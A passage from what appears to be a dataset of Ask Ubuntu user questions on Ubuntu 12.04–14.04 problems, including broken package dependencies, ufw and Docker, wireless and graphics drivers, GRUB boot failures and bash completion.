xorg-video-abi-14 [ amd64 ] < none > ( none ) broken icu-devtools : amd64 breaks on icu-tools [ amd64 ] < 4.8.1.1-12ubuntu2 > ( libdevel ) ( < 52.1-3~ ) broken icu-devtools : amd64 breaks on icu-tools [ i386 ] < none > ( none ) ( < 52.1-3~ ) broken xserver-xorg-video-nouveau : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-glamoregl : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-radeon : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken libcogl-pango12 : amd64 depends on libcogl12 [ amd64 ] < 1.14.0-2 > ( libs ) ( > = 1.13.4 ) broken libgd-gd2-perl : amd64 conflicts on libgd-gd2-noxpm-perl [ amd64 ] < none - > 1:2.46-2.1build1 > ( universe/perl ) broken gnome-control-center-datetime : amd64 depends on indicator-datetime [ amd64 ] < 13.10.0+13.10.20131023.2-0ubuntu1 - > 13.10.0+14.04.20140415.3-0ubuntu1 > ( misc ) ( = 13.10.0+13.10.20131023.2-0ubuntu1 ) broken libghc-comonads-fd-dev : amd64 depends on libghc-comonad-dev-3.0.1.1-45093 [ amd64 ] < none > ( none ) broken libperl5.14 : amd64 depends on perl-base [ amd64 ] < 5.14.2-21build1 - > 5.18.2-2ubuntu1 > ( perl ) ( = 5.14.2-21build1 ) broken libghc-comonads-fd-prof : amd64 depends on libghc-comonads-fd-dev [ amd64 ] < 3.0.1-2build2 > ( haskell ) ( = 3.0.1-2build2 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-ati [ amd64 ] < 1:7.3.99+git20140420.48d3dbc8-0ubuntu0ricotz~saucy > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-intel [ amd64 ] < 2:2.99.911+git20140420.08e71e18-0ubuntu0ricotz~saucy > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-nouveau [ amd64 ] < 1:1.0.10+git20140220.480f0998-0ubuntu0sarvatt~saucy > ( x11 ) broken xserver-xorg-video-intel : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-ati : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-nouveau : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-ati [ amd64 ] < 1:7.3.99+git20140420.48d3dbc8-0ubuntu0ricotz~saucy > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-intel [ amd64 ] < 2:2.99.911+git20140420.08e71e18-0ubuntu0ricotz~saucy > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-nouveau [ amd64 ] < 1:1.0.10+git20140220.480f0998-0ubuntu0sarvatt~saucy > ( x11 ) broken xserver-xorg-video-intel : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-ati : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-nouveau : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-ati [ amd64 ] < 1:7.3.99+git20140420.48d3dbc8-0ubuntu0ricotz~saucy > ( x11 ) broken xserver-xorg-video-intel : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-ati : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-nouveau : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-ati [ amd64 ] < 1:7.3.99+git20140420.48d3dbc8-0ubuntu0ricotz~saucy > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-intel [ amd64 ] < 2:2.99.911+git20140420.08e71e18-0ubuntu0ricotz~saucy > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-nouveau [ amd64 ] < 1:1.0.10+git20140220.480f0998-0ubuntu0sarvatt~saucy > ( x11 ) broken xserver-xorg-video-intel : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-ati : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-nouveau : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-ati [ amd64 ] < 1:7.3.99+git20140420.48d3dbc8-0ubuntu0ricotz~saucy > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-intel [ amd64 ] < 2:2.99.911+git20140420.08e71e18-0ubuntu0ricotz~saucy > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-nouveau [ amd64 ] < 1:1.0.10+git20140220.480f0998-0ubuntu0sarvatt~saucy > ( x11 ) broken xserver-xorg-video-intel : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-ati : amd64 depends on xserver-xorg-video-glamoregl [ amd64 ] < 0.6.0+git20140313.a4fbc773-0ubuntu0sarvatt~saucy > ( x11 ) broken xserver-xorg-video-ati : amd64 depends on xserver-xorg-video-radeon [ amd64 ] < 1:7.3.99+git20140420.48d3dbc8-0ubuntu0ricotz~saucy > ( x11 ) broken xserver-xorg-video-mach64 : amd64 depends on xorg-video-abi-15 [ amd64 ] < none > ( none ) broken xserver-xorg-video-r128 : amd64 depends on xorg-video-abi-15 [ amd64 ] < none > ( none ) broken xserver-xorg-video-glamoregl : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-intel : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-ati : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-radeon : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-nouveau : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-ati [ amd64 ] < 1:7.3.99+git20140420.48d3dbc8-0ubuntu0ricotz~saucy > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-intel [ amd64 ] < 2:2.99.911+git20140420.08e71e18-0ubuntu0ricotz~saucy > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-nouveau [ amd64 ] < 1:1.0.10+git20140220.480f0998-0ubuntu0sarvatt~saucy > ( x11 ) could anyone please advise me on what to do next ? thx in advance
454607	ufw rules do n't work with docker	i have a 12.04.4 server , and i have enabled ufw , and have tried to block port 8080 . however , it is still open . $ sudo ufw deny 8080 rule added rule added ( v6 ) $ sudo ufw status numbered status : active to action from -- -- -- -- -- -- [ 1 ] 22 allow in anywhere [ 2 ] 80 allow in anywhere [ 3 ] 8080 deny in anywhere [ 4 ] 22 allow in anywhere ( v6 ) [ 5 ] 80 allow in anywhere ( v6 ) [ 6 ] 8080 deny in anywhere ( v6 ) thoughts ? i can still access the website that is on 8080 . i have rebooted the system several times . the ip address is handled via static assignment , but i ca n't find anything that would indicate that that is the problem . the service i 'm trying to block is on a docker instance , however this question did not help .
454614	network manager not listing wireless networks	i just installed ubuntu 14.04 on my laptop . before i used ubuntu 13.10 and i had no problem accessing the list of wireless network until i installed this version of ubuntu . all of a sudden , the network manager does n't seem to be picking up any wireless networks . this is some hardware informations : sudo uname -a linux aimad-vostro-1015 3.13.0-24-generic # 46-ubuntu smp thu apr 10 19:08:14 utc 2014 i686 i686 i686 gnu/linux sudo lspci 00:00.0 host bridge : intel corporation mobile 4 series chipset memory controller hub ( rev 07 ) 00:02.0 vga compatible controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) 00:02.1 display controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) 00:1a.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 4 ( rev 03 ) 00:1a.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 5 ( rev 03 ) 00:1a.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 6 ( rev 03 ) 00:1a.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 2 ( rev 03 ) 00:1b.0 audio device : intel corporation 82801i ( ich9 family ) hd audio controller ( rev 03 ) 00:1c.0 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 1 ( rev 03 ) 00:1c.1 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 2 ( rev 03 ) 00:1c.3 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 4 ( rev 03 ) 00:1c.4 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 5 ( rev 03 ) 00:1c.5 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 6 ( rev 03 ) 00:1d.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 1 ( rev 03 ) 00:1d.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 2 ( rev 03 ) 00:1d.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 3 ( rev 03 ) 00:1d.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 1 ( rev 03 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev 93 ) 00:1f.0 isa bridge : intel corporation ich9m lpc interface controller ( rev 03 ) 00:1f.2 sata controller : intel corporation 82801ibm/iem ( ich9m/ich9m-e ) 4 port sata controller [ ahci mode ] ( rev 03 ) 00:1f.3 smbus : intel corporation 82801i ( ich9 family ) smbus controller ( rev 03 ) 09:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 03 ) 0c:00.0 network controller : broadcom corporation bcm4312 802.11b/g lp-phy ( rev 01 ) 0f:00.0 sd host controller : ricoh co ltd mmc/sd host controller ( rev 01 ) 0f:00.1 system peripheral : ricoh co ltd r5u2xx ( r5u230 / r5u231 / r5u241 ) [ memory stick host controller ] ( rev 01 ) 0f:00.3 firewire ( ieee 1394 ) : ricoh co ltd r5c832 pcie ieee 1394 controller ( rev 01 ) sudo ifconfig eth0 link encap : ethernet hwaddr b8 : ac:6f:5c : bb:2c inet addr:192.168.137.228 bcast:192.168.137.255 mask:255.255.255.0 inet6 addr : fe80 : :baac:6fff : fe5c : bb2c/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:7636 errors:0 dropped:0 overruns:0 frame:0 tx packets:6811 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:7458372 ( 7.4 mb ) tx bytes:856551 ( 856.5 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:804 errors:0 dropped:0 overruns:0 frame:0 tx packets:804 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:61777 ( 61.7 kb ) tx bytes:61777 ( 61.7 kb ) wlan0 link encap : ethernet hwaddr f0:7b : cb:56 : ca : f8 inet6 addr : fe80 : :f27b : cbff : fe56 : caf8/64 scope : link up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:2495 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:17 base address:0xc000 how can i solve this problem ? edit : this is the content of the file /etc/network/interfaces : # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback
454616	reinstalling ubuntu 14.04	i have ubuntu 12.04 on dual boot windows 7 , and i am trying to reinstall ubuntu 14.04 instead of 12.04 i made a bootable pendrive with ubuntu 14.04 and plugged it in but there is no installing option showing . how do i proceed from here ? i do not know anything about linux so i need a lot of help . thanks in advance . “you have to boot from the usb drive “ i tried to do it . i plugged in the pendrive with ubuntu 14.04 . restarted the computer pressing f12 , and i got the boot menu . one of the options here was “removable drive” but it did not have a star in front of it . when i entered this option i get a regular grub page with no option for pendrive . so i booted to ubuntu and opened the pendrive with ubuntu . there was a whole bunch of files in there . i just do not know what to do with them when i installed ubuntu 12.04 a couple months back , i just plugged the pendrive with ubuntu and was able to go through the boot menu to acess intallation . this time it just does not work that way . am i missing something here ? would you give me step-by-step to boot from usb drive ? i booted computer as you said . the boot menu gave me those options : removable drive ( there was no + sign in front of it ) + hard drive + cd/dvd/cd-rw drive + network diagnostics ( there was no + sign in front of it ) set up i selected “removable drive” and got : gnu grub version 1.99-21ubuntu3.14 ubuntu , with linux 3.11.0-15-generic ubuntu , with linux 3.11.0-15-generic ( recovery mode ) memory test ( memtest86+ ) memory test ( memtest86+ , serial console 115200 ) windows7 ( loader ) ( on /dev/sda1 ) with no “try ubuntu” option .
454621	no wifi , brightness adjustment after returning from sleep mode , and hibernation function with amd radeon hd 6480g gpu	i have the following gpu : $ lspci | grep -i vga 00:01.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] sumo [ radeon hd 6480g ] i 've tried with the following drivers : fglrx-updates from the repo ( 2:13.350.1-0ubuntu2 ) latest fglrx beta ( i ca n't see the open source ati/amd driver in the list of `` additional drivers '' ) on both 14.04 and 12.04.4 lts , but the situation is not changed : there is no hibernation function after returning from sleep mode , ( sometimes ) there is not possible to connect to a wifi network ( i have rtl8188ce wifi adapter ) after returning from sleep mode , ( always ) not possible to adjust the brightness - what is critical for a travelling student ... outside i want more brighter screen , than inside at the university ... do someone have any solution to these problems ?
454623	should i install intel graphics installer for intel mobile gm965/gl960	colours are especially bad when viewing the same video file in windows 7 . another user also mentioned it before , so if anyone can update me on the issue , i 'll be grateful . i 'm using ubuntu 14.04. results of lspci -v | less are : 00:00.0 host bridge : intel corporation mobile pm965/gm965/gl960 memory controller hub ( rev 03 ) subsystem : toshiba america info systems device ff64 flags : bus master , fast devsel , latency 0 capabilities : < access denied > kernel driver in use : agpgart-intel 00:02.0 vga compatible controller : intel corporation mobile gm965/gl960 integrated graphics controller ( primary ) ( rev 03 ) ( prog-if 00 [ vga controller ] ) subsystem : toshiba america info systems device ff64 flags : bus master , fast devsel , latency 0 , irq 44 memory at 92100000 ( 64-bit , non-prefetchable ) [ size=1m ] memory at 80000000 ( 64-bit , prefetchable ) [ size=256m ] i/o ports at 5110 [ size=8 ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : i915 00:02.1 display controller : intel corporation mobile gm965/gl960 integrated graphics controller ( secondary ) ( rev 03 ) subsystem : toshiba america info systems device ff64 flags : bus master , fast devsel , latency 0 memory at 92200000 ( 64-bit , non-prefetchable ) [ size=1m ] capabilities : < access denied > p.s . i 'm aware that intel graphics installer is not yet available to 14.04 , but when it does , i want to know if i should install it , or if it will make any difference on my overall video performance .
454626	ca n't login to windows7 and ubuntu ( dual boot )	it has been a week since i did n't restart my pc so i thought it would be a good idea to restart it while i was on windows . but when it restarts nothing happens . it shows mainboard screen then screen goes black where it normally would show 'choose your operating system ' screen . luckly i had ubuntu on my pendrive , it started without any problem . i can open files on my hdd , i think there is no hardware problem , everything seems working good . i did n't make any critical change while i was on windows as far as i remember other then installing and uninstalling softwares . i have n't been using ubuntu for a while so there should n't be problem caused by ubuntu . does the situation look familiar to you ? what 's the problem , any idea , suggestion ?
454632	will installing ubuntu erase os on chosen disk ?	if using `` something else '' option during instalation of ubuntu for boot loader installation i choose a device that already has one os ( ubuntu 6.06 in that case ) will this os be removed or will new ubuntu install alongside it ? do i have to format the partition ?
454634	how to check if openchrome is installed in my system or what graphics driver is installed in ubuntu 14.04	i want to know if openchrome is installed in my computer or not . my motherboard is asus a8v-mx 939 via k8m800 micro atx amd and its onboard video chipset : s3 graphics unichrome pro igp with 1gb ram currently my installation of ubuntu is running very laggy . so help me install the correct driver for my hardware or help to find the source . thanks .
454637	mounting another hard drive	i 've just set up my new pc and i 've got an ssd that i installed trusty tahr on ( and also win8 , but that does n't really matter i guess ) . i 've got another hd that i want to use for data ( pictures , movies and stuff ) . when i first booted up ubuntu , the hd was already mounted at /media/myusername/data ( `` data '' is the volume description i used when formatting it ) . i immediately started moving some data around and created some symlinks to it . however , now that i rebooted , all my symlinks are broken because /media/myusername/data is now suddenly mounted as root . it is however also mounted as myusername under /media/myusername/data1 : myusername @ myusername-ubuntu : ~ $ ls -l /media/myusername total 8 drwx -- -- -- 2 root root 4096 apr 24 18:40 data drwx -- -- -- 1 myusername myusername 4096 apr 24 16:44 data1 i do n't actually want it to be mounted as root ever , how can i change that ?
454640	second monitor intel graphics card	i have a second monitor which works perfectly fine on windows . however , on ubuntu 13.10 i am running into a couple of weird issues : if i connect it after booting ubuntu , it duplicates the display of my laptop screen ( at my laptop screen 's resolution ) . the screen is however not detected in `` displays '' and i can not do anything with it . if i connect it before booting , it goes straight to cli and i can not startx . it says `` no screens found '' . x -configure also fails , saying that the number of created screens does not match the number of detected devices . any insight into this would be greatly appreciated .
454642	low free disc space please help	i received a warning of limited space so i deleted a bunch of videos and removed old programs i do n't use any more . then i downloaded bleach bit and ran that but that a warning pops up saying i have even less free space then when i started . please help ! filesystem size used avail use % mounted on /dev/sda1 146g 92g 47g 67 % / udev 489m 4.0k 489m 1 % /dev tmpfs 199m 856k 198m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 497m 112k 497m 1 % /run/shm
454644	how do i install a grub theme to the grub installation on the mbr ?	i have a setup that has a bootloader that is installed to the mbr , but also a bootloader on the partition for my linux installation ; i want to know how i can theme the grub installation on the mbr , as it is the only one that regularly appears upon booting as i have multiple oss on my computer . if someone could give me an answer that is done without 3rd party applications , that would be great , also , if it is from the command line i 'd be fine with that as well , as long as the commands are given .
454645	does clamav scan windows virus ?	i 'm new to ubuntu . i 'm now setting up an owncloud server which supports clamav file scan . since most of the users connected to the server uses windows os , can clamav scan for windows virus ? i also did some research that such as bitdefender . it clams that it scans real time , if someone upload files to the server , will bitdefender scan the file even owncloud does n't support ? by the way , i heard that if i update the system frequently , i do n't have to install any antivirus that scan for linux virus . is that right ?
454646	keyboard layout en after boot	i ca n't believe this bug has still not been solved with ubuntu 14.04 ? on my 2 laptops , acer and asus , on a random basis , the keyboard layout switch from fr to en . this is very frustrating when you type a password and ca n't see the letters . how to solve that for good ?
454649	how can i make sudoedit use vim instead of nano ?	i 'm trying to use sudoedit , but it keeps running the nano editor . my preferred editor is vim . how can i make it the default ? looking at the man page , man sudoedit , i 've noticed the following : editor default editor to use in -e ( sudoedit ) mode if neither sudo_editor nor visual is set . sudo_editor default editor to use in -e ( sudoedit ) mode . visual default editor to use in -e ( sudoedit ) mode if sudo_editor is not set . so i 've set them all to /usr/bin/vim , but sudoedit /etc/hosts still uses nano . am i missing something ? $ editor=/usr/bin/vim $ visual=/usr/bin/vim $ sudo_editor=/usr/bin/vim $ echo $ visual /usr/bin/vim $ echo $ editor /usr/bin/vim $ echo $ sudo_editor /usr/bin/vim $ sudoedit /etc/hosts # this is still using nano
454651	canon ixus 155 camera no longer found when connected to usb after update to 14.04	previously i used ubuntu 13 or older versions on my pcs and the canon ixus 155 camera was detected on their usb ports . with ubuntu 14.04 this is suddenly no longer true . btw : my other camera , a nikon , is still detected easily when i use the same cable . likewise usb sticks and other usb devices show up when plugged in . on another pc which i have also updated to ubuntu 14.04 the same problem occurred . when i connected the ixus 155 to another computer with windows os there it works . it may not be a problem of the camera i think . when i started 'lsub ' in the terminal and the cam connected i found a canon device listed . ****-desktop : ~ $ lsusb bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 005 device 002 : id 0461:4de3 primax electronics , ltd bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 015 : id 04a9:328a canon , inc . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 003 : id 0603:00f2 novatek microelectronics corp . bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub what can i do to solve the problem ? best regards johannes edit : after some trial and error i was able to connect to my camera now and download the pictures using the 'gphoto2 ' command line interface . ( this is just a workaround and not what i really want )
454655	burn iso in usb - ubuntu 14.04 lts	i have an iso file & i would like to burn it on my usb . how can i do that please thank you
454657	what happens after /tmp reaches the limit of tmpfs	imagine this is the configuration in /etc/fstab ( /tmp directory uses tmpfs wih maximum size of 10m ) . none /tmp tmpfs noatime , nodiratime , size=10m 0 0 i want to know what exactly happens when /tmp folder reaches the maximum size limit ( 10m in this case ) . does it get cleaned and start over or something happens to the system ?
454664	acer travelmate 5735z - how do i update graphic drivers ?	i 'm new to this forum and relatively in ubuntu . i 've read a lot of forum threads and pages about a problem that occurs with my laptop and ubuntu : it does n't go well together ( i had ubuntu 10.04 till yesterday and it worked but i read that they fixed this problem in ubuntu 14.04 , so i installed it and it was only partially solved , which means i could see on the screen but i had to modify the quiet splash with nomodeset` in the kernel . ) i would like to know how can i update my graphic drivers , because i read that my laptop model is not supported by the ubuntu version of the drivers . first of all , i would like to know if there is a terminal command to know which graphic card i have . then how can i update the drivers for that graphic card using non-official drivers because official ones seem not to exist . i 'm sorry if i 'm asking things you 've already explained to a lot of people , but i was unable to find a solution myself in the forum .
454671	striiv and wine not working	i have a striiv pedometer that i need to sync to my computer . i open the installer with wine and it seems to run , but then just stops and disappears . i have no idea where it goes or what i need to do to use this device with ubuntu . please help me .
454672	i do n't know the authentication password	i am new to ubuntu , and i just installed it . when i update , an authentication password is asked , but i do n't know what password it is that i should enter .
454673	unity crashes when using scale effect ( spreading windows/super+w ) 14.04	i do n't know what happened but i changed some stuff in unity tweak tool and now whenever i use super + w combination to use scale effect ( i think this is what it is called , it spreads all open windows ) , unity crashes and i have to restart lightdm to get it back . i only changed theme to radiance , set up some hot corners and disabled/enabled window spread ( also checked and unchecked `` icons on previews '' and `` click to access desktop '' boxes ) . i 've tried to undo every possible change i made but no use whenever i press super + w , unity crashed ( no launcher , no top bar , no window decorations ) . how can i safely fix this ?
454674	i need help creating a vm that runs ubuntu 13.10	i followed instructions from this website explicitly http : //www.howtogeek.com/56158/beginner-how-to-create-a-virtual-machine-in-windows-7-using-virtual-pc/ once i attempt to install ubuntu 13.10 to the vm i created it does the regular boot . i selected the language , then chose to install . then a message shows up saying '' this kernel requires an x86-64 cpu , but only detected an i686 cpu . unable to boot - please use a kernel appropriate for your cpu . '' what kernel should i be using to do this . i also attempted this with a toshiba 500gb portable hard drive , and the same message appeared . i also tried using an install disk , as well as the iso that 's on my pc . these are my system properties to help any of you help me . model : hp p7-1257c processor : amd a8-3820 apu with radeon ( tm ) hd graphics 2.50 ghz os : windows 7 home premium 64-bit ram : 8.00 gb ( 7.48 gb usable ) thanks for any help you can offer
454677	failure to succesfully sync an ipod using rhythmbox on ubuntu 14.04	after a day of trying to figure out how to get this sync going i found out a few things : for some reason there has been a lot of trouble syncing ipods with rhythmbox in ubuntu 14.04 , lots of people apparently have this problem including me . the most paramount problem that i had today was that every time i would click on my ipod in rhythmbox under devices , rhythmbox would shut down . it took me a while to figure out that the solution to this problem was a very simple one ; turning off the following plug-in : `` portable players - ipod , '' after i unmarked this check box i was able to access the files on my ipod ... however , i am still not able to actually sync my library with the ipod . so ... could somebody please help me come up with a good solution for this problem ? i thank y'all very much in advance ! p.s . i have the ipod classic 160gb version so nuthin ' fancy .
454680	hdd and usb drives refuses to boot , just sends me to grub-rescue	i have 2 hard drives installed in my computer . on one hard drive , i had ubuntu 14.04 and the other was a windows 7 hdd . today i had to delete the ubuntu hdd . i did this from my win7 partition manager . now when i try to boot my computer from the live usb , it sends me int grub rescue mode . if i try to load my win7 hdd , it sends me to grub rescue mode . no matter where i set my boot device/partition , i land in grub rescue . how can i get my live usb to start , so that i can install grub and ubuntu ? please go easy on me , i am very much still a noob when it comes to the world of linux . i 've only been dabbling for about 10 months now . any help is very much appreciated . thank you .
454683	sync walkman with ubuntu	can anyone help me with synchronizing my sony walkman with ubuntu ? i have tried everything and searched everywhere but nothing works !
454687	problem playing video in totem 14.04	i 'm having trouble playing videos in ubuntu . after upgrading from 13.10 to 14.04 totem crashes if i move the slider . i am playing a mkv file . it starts playing alright , but if i move the slider totem crashes . it used to work like a champ in 13.10 so i know the problem is not in the file . i switched to vlc and it does n't seem to have the same problem . any ideas ? is this a known issue ?
454688	how do you cd into the first available folder without typing out the name ?	i was recently in a predicament where i was inside a folder , and i wanted to cd to a sub directory folder . there was only one folder , inside this folder and it was a really long name . home ( i am here ) | | -- > /reallylongnamefolder is there any way of going into that folder instead of typing out : cd reallylongnamefolder
454693	gpu driver problem ubuntu 14.04	so just updated to 14.04 version of ubuntu.checked my vga/gpu driver it says : gallium 0.4 on amd rv730.i have an old radeon hd 4650 bcs my 7770 died.will i have problem with the driver and how can i update it ? thanks
454696	ubuntu 14.04 was installed on wrong drive	windows vista is on my c : dive . while installing ubuntu , somehow it installed on my other drive which is d : when i start the pc it does not recognize the d : drive after i am in windows . just shows c : drive not the d ; dive . so how do i make windows recognize the d : drive or how do i delete ubuntu on the d : drive ? i can get into ubuntu and once i am there it does recognize the c : drive . thank you , roscoe
454699	ubuntu 14.04 crashes on nvidia drivers update	i just did a fresh install of ubuntu 14.04 and all works fine until i update the nvidia drivers : the update apparently goes ok but when i reboot the machine it crashes after the grub 's window . if i chose the first option ( ubuntu genereic kernel ... .. ) by hitting enter , the system crashes after few second , as if i had unplugged the power cord . the weirdest thing is that i am unable to restart the computer from the on/off button , to restart it i have to unplug the power cable , wait about 10 seconds then i can restart it ( just to see it crashing again ) . what should i do ? at the moment i can only acces the pc with a live cd ! ( and works fine ) my computer : ubuntu 14.04 64bit , amd eight core , 16gb ram , nvidia gtx560 .
454702	install mysql workbench without installing mysql ( i.e . alongside percona )	i have percona server and client installed locally and i would like to install mysql workbench as well . however , whenever i attempt to install mysql workbench , it tries to remove percona ( and vice versa ) . suggestions on either installing mysql workbench alongside percona or installing mysql workbench without installing mysql ?
454703	ca n't start some apps , problem might have to do with ttf fonts	i 'm on a fresh install of x86 14.04 , having trouble starting some applications , and the problem apparently has something to do with ttf fonts . when i start a few apps , for example roguelike game dungeon crawl stone soup , installed from the software center , i get : error : could not find font '/usr/share/fonts/truetype/ttf-dejavu/dejavusansmono.ttf i tried a few other apps , what happens is they just show a black screen for a second and then i go back to desktop , and the error reporter starts . if i start them from the terminal , i can see what the error is , it 's not identical for every app , but mostly it shows `` could not find a .ttf '' or , `` a .ttf does not exist '' . i checked , i have restricted extras and the actual fonts installed . tried changing the permissions on the actual files and folders themselves , even changed the ownership of usr to myself , but the error persists . i ca n't check whether or not the live system has the problem on this machine right now . thanks in advance .
454705	issue upgrading to 14.04	currently , my machine is running 12.04 , despite the system being up-to-date , the update manager does not show 14.04 as a new upgrade that i can use ( in the software sources window , i have checked the option to notify me when a new lts upgrade is there ) . any ideas ?
454706	list of available languages includes only english	i have installed ubuntu 14.04 . i tried to install ukrainian language . when i pressed install/remove languages the list of available languages contained only english : how could i fix it ?
454709	keyboard language	i installed ubuntu 13.10 english version . i can view chinese characters on the system , but i would like to key chinese characters as well . i would like to know any language package to actually to key chinese in the system ? your information and help is great appreciated , regards , inung
454711	how can you mirror an autocomplete function in your own aliases ( in 14.04 )	i have a bunch of aliases that i 've used on my 12.04 machine . example : alias pssh= '' tsocks ssh '' alias pscp= '' tsocks scp '' alias prdp= '' tsocks xfreerdp ... ... ... .something ... . '' these aliases are modifications of regular linux commands ( scp , ssh ect . ) therefore i 'd like these aliases to have the same autocomplete rules as their original counterparts . i do n't want to write my own rules as the rules for the regular commands are perfectly fine . in 12.04 the following worked perfectly : complete -f _ssh pssh complete -f _scp pscp complete -f _ssh prdp this does n't work in 14.04 . if i try to autocomplete i get the following error : bash : completion : function `_ssh ' not found if i autocomplete on ssh before i try pssh everything works . as far as i know , it 's because the autocomplete rules are not loaded before they are used . until the autocomplete rules for ssh gets loaded , my rules are invalid and result in an error . how to i fix this , how do i correctly hook my alias into an autocomplete rule defined for a regular linux command ?
454712	no bluetooth with intell 7260 ac in ubuntu 14.04	i just installed the new wifi 7260 ac + bluetooth 4.0 card from intel in my laptop . the card is automatically detected by ubuntu 14.04 x64 ( kernel 3.10.+ ) and my wifi is stable and very speedy . but no bluetooth , the system ca n't detect the bluetooth adapter . sudo lshw -c network *-network description : interface réseau sans fil produit : wireless 7260 fabriquant : intel corporation identifiant matériel : 0 information bus : pci @ 0000:02:00.0 nom logique : wlan1 version : 73 numéro de série : ac:7b : a1 : df : b2:0e bits : 64 bits horloge : 33mhz fonctionnalités : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.13.0-24-generic firmware=22.24.8.0 ip=192.168.1.249 latency=0 link=yes multicast=yes wireless=ieee 802.11abgn ressources : irq:52 mémoire : f7000000-f7001fff *-network description : ethernet interface produit : rtl8111/8168/8411 pci express gigabit ethernet controller fabriquant : realtek semiconductor co. , ltd. identifiant matériel : 0 information bus : pci @ 0000:05:00.0 nom logique : eth0 version : 06 numéro de série : f0 : bf:97:5f : f4:1c taille : 10mbit/s capacité : 1gbit/s bits : 64 bits horloge : 33mhz fonctionnalités : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl_nic/rtl8168e-2.fw latency=0 link=no 